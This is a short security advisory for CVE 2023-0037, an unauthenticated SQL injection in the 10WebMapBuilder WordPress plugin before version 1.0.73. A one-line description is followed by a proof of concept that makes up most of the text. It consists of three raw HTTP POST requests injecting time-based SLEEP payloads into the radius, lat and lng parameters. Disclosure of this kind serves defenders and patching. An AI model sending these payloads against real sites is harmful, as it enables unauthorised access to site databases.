10WebMapBuilder < 1.0.73 – Unauthenticated SQLi | CVE 2023-0037

Description

The plugin does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection

Proof of Concept

Note: /2022/12/29/map/ is page/post where the Google_Maps_WD is embed

POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85

radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&lat=0.0&lng=0.0&distance_in=km


POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

radius=1&lat=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&lng=0.0&distance_in=km


POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

radius=1&lat=0.0&lng=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&distance_in=km